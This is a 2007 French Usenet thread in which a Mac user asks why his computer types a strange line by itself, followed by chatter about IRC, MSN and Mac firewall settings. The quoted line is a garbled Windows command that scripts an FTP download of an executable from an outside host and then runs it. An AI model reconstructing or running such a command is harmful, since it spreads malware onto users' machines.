Un Virus ?

RiGuad
Je m'en remet aux avis autorisés n'y comprenant plus rien a une
situation que je vis depuis 2 semaines :

Dans n'importe quelle situation, a n'importe quel moment , y compris
quand mon Imac (Sous OS a jour Tiger) est parfaitement inactif, il
"écrit " tout seul les "choses" suivantes :

(syste,root(`syste,ӎ`c,d:exe
c,d =c echo open ftp:hyper,qrt:net é& :: ik èecho user joh joh :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit

Apres cela, mon clavier est incohérent a la frappe, je suis obligé de le
debrancher de son port usb, et de le rebrancher.
Là il refonctionne correctement, jusqu'a la fois suivante ou le Mac
"prend la main" sur tout ce que je peux faire , y compris debrancher le
clavier pendant, je dis bien pendant qu'il ecrit la suite de caracteres
ci dessus indiquée.

Un reboot ne change rien, ni reparation des autorisation, ni extinction
redémarrage.

Le plus insupportable est lorsque l'on tchatte avec un ami, ou cette
ligne incontrolable se tape toute seule , et ... se termine par un
Return ! L'ami recoie ca en plleine figure, et je dois debrancher
rebrancher mon clavier pour m'excuser.

Qu faire pour arreter ceci ? je ne vais quand meme pas reinstaller mon
Tiger ! ?

Merci a tous.

patpro ~ patrick proniewski
In article ,
Nina Popravka wrote:

On Mon, 05 Mar 2007 22:39:51 +0100, patpro ~ patrick proniewski
wrote:

ben franchement, je fréquente qu'IRCnet, et donc j'ai toujours eu les IP
visibles.

Je cauchemarde...
Je pensais être entourée de barbus, je me retrouve au milieu de
suppôts de MSN.

holala, mais que dis tu malheureuse ! :)
Va pas nous mélanger avec les kikooteurs d'MSN !

patpro

--
http://www.patpro.net/

patpro ~ patrick proniewski
In article <45ec9017$0$5107$,
RiGuad wrote:

(c'est quoi ces serveurs IRC qui masquent l'IP ??)

Ce sont les serveur IRC de Orange irc.voila.fr accessible là par
le webchat:

... Si t'es en webchat, c'est normal qu'on voit pas ton IP, vu que c'est
le serveur web qui est connecté à l'ircd.

patpro

--
http://www.patpro.net/

RiGuad
On Mon, 05 Mar 2007 18:10:23 -0400, RiGuad
wrote:

lol... encore eut il fallut que j'en eusse une (Sassdissa ?)

Ok... d'où l'explication d'IRC.
T'as Meetic, aussi... le panel est plus large.

Ah non , je t'en prie , pas toi Nina... l'IRC et ses canaux c'est pas
systematiquement le minitel rose, il y a des chan specifiques pour ca ,
genre "Charme".
Mais les milliers de dials qui s'echangent par jour sur l'IRC (dont
MacBidouille use efficacement en ayant créé son chan sur
irc.inet.tele.dk, sans parler de celui de Mac4ever...) ne traitent pas
forcément du theme de meetic.
et la comme tu dis , le "je vois ta tronche sur catalogue mais je'te
connais pas, j'peux pas...

Nina Popravka
On Mon, 05 Mar 2007 23:32:41 +0100, patpro ~ patrick proniewski
wrote:

Va pas nous mélanger avec les kikooteurs d'MSN !

Heu... kikoooooooooooo Pat ?
;-)
--
Nina

RiGuad
In article <45ec9017$0$5107$,
RiGuad wrote:

[...]

Tootafé , mais par un Client IRC genre Snak que j'utilise, c'est itou...
no IP, mais IP remplacé par une suite de chiffre... c'est chiadé, hein ?

laurent.pertois
Nina Popravka wrote:

Je sais... Mais fonctionnellement je ne supporte ni l'un ni l'autre.
Le "je te vois mais tu me réponds pas" , je peux pas.

Fais comme moi, lis les extraits sur bashfr.org :)

--
Politically Correct Unix - UTILITIES

laurent.pertois
Nina Popravka wrote:

Chouette, je sens que je vais y croiser Laurent Pertois.
Laurent, viendez, y a un chan MacBidouille !!!!!!!!

Euh, si tu continues je t'offre un AppleShare IP !

--
Politically Correct Unix - UTILITIES

RiGuad
Autant que je sache, NetBarrier n'est qu'une interface de daemons Unix
préxistants

Ainsi donc NetBArrier ne fait rien de plus que le coupe feu du Mac ,
sinon qu'il presente les choses de maniere différente ?

Bloquer le trafic UDP (sauf su on faot du P2P)

UDP signifie t-il le trafic "Entrant" ?

Activer la conservation
de l'historique du coupe-feu et Activer le mode furtif

Furtif signifie t il qu'on ne repond pas aux Ping ?
Je me trompe ou Wanadoo n'envoie pas t il pas des ping reguliers pour
savoir si il y a du monde ?

Pour vivre heureux, vivons cachés ;-)

Sinon, si tu veux te donner des angoisses, tu as Utilitaire de réseau et
Netstat ou Port scan ...

Henri

laurent.pertois
Nina Popravka wrote:

On Mon, 5 Mar 2007 23:48:37 +0100,
(Laurent Pertois) wrote:

Euh, si tu continues je t'offre un AppleShare IP !

Un original ????

J'en ai croisé un il n'y a pas longtemps, en plus, avec l'installation
d'OpenDoc et tout et tout :)

Waouuuuu collector !

Carrément.

On fait l'échange contre un NT4 et un Exchange 5.5 ???
:-)

Euh, comment dire...

--
Politically Correct Unix - UTILITIES

Christophe Cuq
(Laurent Pertois) writes:

Fais comme moi, lis les extraits sur bashfr.org :)

La consultation de ce site devrait être remboursée par la sécurité
sociale comme anti-dépresseur :)

--
CHC